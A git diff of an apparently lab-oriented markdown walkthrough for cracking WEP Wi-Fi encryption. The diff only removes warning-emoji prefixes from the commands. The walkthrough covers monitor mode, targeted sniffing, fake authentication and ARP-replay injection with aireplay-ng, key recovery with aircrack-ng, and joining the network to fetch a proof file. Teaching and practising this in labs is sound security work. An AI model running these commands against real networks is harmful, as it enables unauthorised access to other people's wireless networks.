--- a/1.wep_attack_flow.md
+++ b/1.wep_attack_flow.md
@@ -7,8 +7,8 @@
 Let's go!
 
 ```bash
-⚠️ sudo airmon-ng check kill
-⚠️ sudo airmon-ng start wlan0
+sudo airmon-ng check kill
+sudo airmon-ng start wlan0
 ```
 
 This will enables monitor mode on `wlan0mon`.
@@ -20,7 +20,7 @@ This will enables monitor mode on `wlan0mon`.
 At this point we want to scan the Network
 
 ```bash
-⚠️ sudo airodump-ng wlan0mon
+sudo airodump-ng wlan0mon
 ```
 With this command we want to identify WEP Network and grab:
 
@@ -40,18 +40,18 @@ So, let's run again airodump-ng targeting just the channel for the WEP Network.
 ## 🎯 2. Targeted Sniffing
 
 ```bash
-⚠️ channel=3
-⚠️ sudo airodump-ng -c ${channel} wlan0mon
+channel=3
+sudo airodump-ng -c ${channel} wlan0mon
 ```
 Note: It can take a while before a station connects. 
 
 Once you have it, grab **CHANNEL, BSSID, ESSID, and the CLIENT** we want to focus on in the attack step.
 
 ```bash
-⚠️ channel=3
-⚠️ bssid='F0:9F:C2:71:22:11'
-⚠️ essid='wifi-old'
-⚠️ client='3E:C8:44:0A:24:BA'
+channel=3
+bssid='F0:9F:C2:71:22:11'
+essid='wifi-old'
+client='3E:C8:44:0A:24:BA'
 ```
 
 Now we are ready to **Capture the Handshake**, in particular we will capture an **authentication handshake frame**.
@@ -77,14 +77,14 @@ This allows you to accumulate enough IVs quickly for aircrack-ng to recover the 
 In terminal 1 tab let's start sniffing specifically on AP ‘wifi-corp’ and dump the output in a capture file.
 
 ```bash
-⚠️ mkdir WEP
+mkdir WEP
 
-⚠️ channel=3
-⚠️ bssid='F0:9F:C2:71:22:11'
-⚠️ essid='wifi-old'
-⚠️ client='3E:C8:44:0A:24:BA'
+channel=3
+bssid='F0:9F:C2:71:22:11'
+essid='wifi-old'
+client='3E:C8:44:0A:24:BA'
 
-⚠️ sudo airodump-ng -c ${channel}  -w dump-wep --output-format pcap,csv --essid ${essid} --bssid ${bssid} wlan0mon
+sudo airodump-ng -c ${channel}  -w dump-wep --output-format pcap,csv --essid ${essid} --bssid ${bssid} wlan0mon
 ```
 
 ---
@@ -99,11 +99,11 @@ In that case the connected client will try to re-authenticate again during our c
 
 
 ```bash
-⚠️ bssid='F0:9F:C2:71:22:11'
-⚠️ essid='wifi-old'
-⚠️ client='3E:C8:44:0A:24:BA'
+bssid='F0:9F:C2:71:22:11'
+essid='wifi-old'
+client='3E:C8:44:0A:24:BA'
 
-⚠️ sudo aireplay-ng -1 3600 -q 10 -a ${bssid} -e ${essid} -c ${client} wlan0mon
+sudo aireplay-ng -1 3600 -q 10 -a ${bssid} -e ${essid} -c ${client} wlan0mon
 ```
 This forces a client to reconnect and trigger ARP traffic.
 
@@ -112,7 +112,7 @@ When you see **Association Succesfull :-)** press CTRL+C to stop the De-Auth pro
 In the same terminal generate traffic in order to find duplicate IV’s
 
 ```bash
-⚠️ sudo aireplay-ng -3 -b ${bssid} -h ${client} wlan0mon
+sudo aireplay-ng -3 -b ${bssid} -h ${client} wlan0mon
 ```
 
 **And when you captured at least 10.000 ARP requests, return to terminal 1 and press CTRL+C to stop airodump.**
@@ -120,7 +120,7 @@ In the same terminal generate traffic in order to find duplicate IV’s
 Also, stop monitoring on wlan0mon
 
 ```bash
-⚠️ sudo airmon-ng stop wlan0mon
+sudo airmon-ng stop wlan0mon
 ```
 
 The real goal is still to collect enough IVs, and ARP injection is the method to make that happen.
@@ -135,7 +135,7 @@ Use aircrack to crack the WEP authentication request.
 
 
 ```bash
-⚠️ aircrack-ng dump-wep-01.cap
+aircrack-ng dump-wep-01.cap
 ```
 
 Expected result:
@@ -151,9 +151,9 @@ KEY FOUND! [ 12:34:56:78:90 ]
 
 # create a WEP connection file
 ```bash
-⚠️ wep_key=11BB33CD55 #you need to remove the colons
-⚠️ essid='wifi-old'
-⚠️ cat << EOF > /tmp/wep.conf
+wep_key=11BB33CD55 #you need to remove the colons
+essid='wifi-old'
+cat << EOF > /tmp/wep.conf
  network={
            ssid="${essid}"
            key_mgmt=NONE
@@ -164,12 +164,12 @@ EOF
 ```
 
 ```bash
-⚠️ sudo wpa_supplicant -i wlan0 -c wep.conf
+sudo wpa_supplicant -i wlan0 -c wep.conf
 ```
 and in another terminal 
 
 ```bash
-⚠️ sudo dhclient wlan0 -v
+sudo dhclient wlan0 -v
 ```
 
 ---
@@ -177,8 +177,8 @@ and in another terminal
 ## ✅ 7. Verify Connection
 
 ```bash
-⚠️ target=192.168.1.1
-⚠️ curl http://${target}/proof.txt
+target=192.168.1.1
+curl http://${target}/proof.txt
 ```
 
 ---
